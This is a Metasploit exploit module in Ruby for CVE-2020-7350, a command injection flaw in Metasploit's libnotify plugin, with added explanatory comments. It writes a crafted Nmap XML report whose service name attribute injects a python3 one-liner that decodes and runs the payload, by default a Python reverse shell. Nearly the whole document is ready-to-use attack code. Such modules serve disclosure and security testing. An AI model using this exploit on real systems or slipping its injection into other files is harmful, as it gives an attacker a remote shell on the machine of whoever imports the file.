This Metasploit module exploits a shell command injection vulnerability in the libnotify plugin. This vulnerability affects Metasploit versions 5.0.79 and earlier.
885145668200c03fca22ddeebb838fd3
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
class MetasploitModule < Msf::Exploit::Remote
  Rank = ExcellentRanking

  # File-format exploit: nothing is sent over the network; the module only
  # writes a crafted file to disk. The mixin supplies file_create and the
  # FILENAME datastore option used in #exploit.
  include Msf::Exploit::FILEFORMAT

  # Registers module metadata and the FILENAME option.
  #
  # The affected component is Metasploit's own libnotify plugin
  # (CVE-2020-7350, Metasploit 5.0.79 and earlier). The generated file is an
  # Nmap-style XML report; presumably the injection fires when an affected
  # installation with the plugin loaded processes the file (e.g. on import) —
  # confirm against the referenced issue, the trigger is not visible here.
  #
  # @param info [Hash] module info merged by update_info
  def initialize(info = {})
    super(update_info(info,
      'Name' => 'Metasploit Libnotify Plugin Arbitrary Command Execution',
      'Description' => %q(
        This module exploits a shell command injection vulnerability in the
        libnotify plugin. This vulnerability affects Metasploit versions
        5.0.79 and earlier.
      ),
      'DisclosureDate' => 'Mar 04 2020',
      'License' => GPL_LICENSE,
      'Author' =>
        [
          'pasta <[email protected]>' # Discovery and PoC
        ],
      'References' =>
        [
          [ 'CVE', '2020-7350' ],
          [ 'URL', 'https://github.com/rapid7/metasploit-framework/issues/13026' ]
        ],
      'Platform' => 'unix',
      # ARCH_CMD: the payload is a shell command string, embedded into the XML
      # built in #exploit, not machine code.
      'Arch' => ARCH_CMD,
      'Payload' =>
        {
          # A command-string payload has no use for NOP padding.
          'DisableNops' => true
        },
      'DefaultOptions' =>
        {
          'PAYLOAD' => 'cmd/unix/reverse_python'
        },
      'Targets' => [[ 'Automatic', {}]],
      'Privileged' => false,
      'DefaultTarget' => 0))
    register_options(
      [
        # Output path for the crafted report; defaults to scan.xml.
        OptString.new('FILENAME', [false, 'The file to write.', 'scan.xml']),
      ]
    )
  end

  # Builds the Nmap-style XML report and writes it to FILENAME.
  #
  # The injection lives in the service "name" attribute of the single port
  # entry: a single quote that closes a shell-quoted argument (presumably the
  # one the plugin builds around the service name — the exact command is not
  # visible here), a command separator, a python3 one-liner that decodes and
  # runs the base32-encoded payload, and a trailing `printf '` that
  # re-balances the quoting. Base32 keeps the payload free of shell and XML
  # metacharacters; Rex::Text.encode_base32 appears to already emit uppercase,
  # so the .upper() call looks redundant (TODO confirm). Note that the literal
  # below is written with %( ) and its lines are part of the string as-is, so
  # their leading whitespace is significant.
  #
  # @return [void]
  def exploit
    xml = %(<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE nmaprun>
<nmaprun scanner="nmap" args="nmap -P0 -oA pepito 192.168.20.121" start="1583503480" startstr="Fri Mar 6 11:04:40 2020" version="7.60" xmloutputversion="1.04">
<host starttime="1583503480" endtime="1583503480"><status state="up" reason="user-set" reason_ttl="0"/>
<address addr="192.168.20.121" addrtype="ipv4"/>
<hostnames>
</hostnames>
<ports>
<port protocol="tcp" portid="22"><state state="open" reason="syn-ack" reason_ttl="0"/><service name="ssh';python3 -c "import os,base64;os.system(base64.b32decode(b'#{Rex::Text.encode_base32(payload.encoded)}'.upper()))"&; printf '" method="table" conf="3"/></port>
</ports>
<times srtt="6174" rttvar="435" to="100000"/>
</host>
<runstats><finished time="1583503480" timestr="Fri Mar 6 11:04:40 2020" elapsed="0.22" summary="Nmap done at Fri Mar 6 11:04:40 2020; 1 IP address (1 host up) scanned in 0.22 seconds" exit="success"/><hosts up="1" down="0" total="1"/>
</runstats>
</nmaprun>
)
    print_status "Writing xml file: #{datastore['FILENAME']}"
    # file_create (from FILEFORMAT) writes the content to datastore['FILENAME'].
    file_create xml
  end
end